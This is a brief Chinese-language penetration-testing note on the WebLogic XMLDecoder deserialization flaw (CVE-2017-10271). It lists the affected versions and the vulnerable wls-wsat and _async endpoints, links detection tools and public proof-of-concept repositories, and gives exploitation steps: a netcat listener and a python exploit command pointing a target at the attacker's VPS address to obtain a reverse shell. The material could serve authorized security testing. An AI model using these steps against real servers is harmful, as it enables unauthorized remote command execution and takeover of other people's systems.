漏洞描述:WebLogic的 WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,执行任意命令
受影响WebLogic版本:
10.3.6.0.0
12.1.3.0.0
12.2.1.1.0
12.2.1.2.0
漏洞检测工具
https://pan.baidu.com/s/1bpg3ppl
手工验证
漏洞点在/wls-wsat/CoordinatorPortType,访问http://192.168.37.136:7001/wls-wsat/CoordinatorPortType
/_async/AsyncResponseService
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType111
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11
出现如下图则证明存在该漏洞;
POC可参考
https://github.com/SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961
https://github.com/RealBearcat/Oracle-WebLogic-CVE-2017-10271
利用python脚本
https://github.com/kkirsche/CVE-2017-10271
监听端口
nc -lvnp 8888
python 运行
python CVE-2017-10271.py -l vpsip -p 8888 -r http://目标ip:7001
成功返回shell
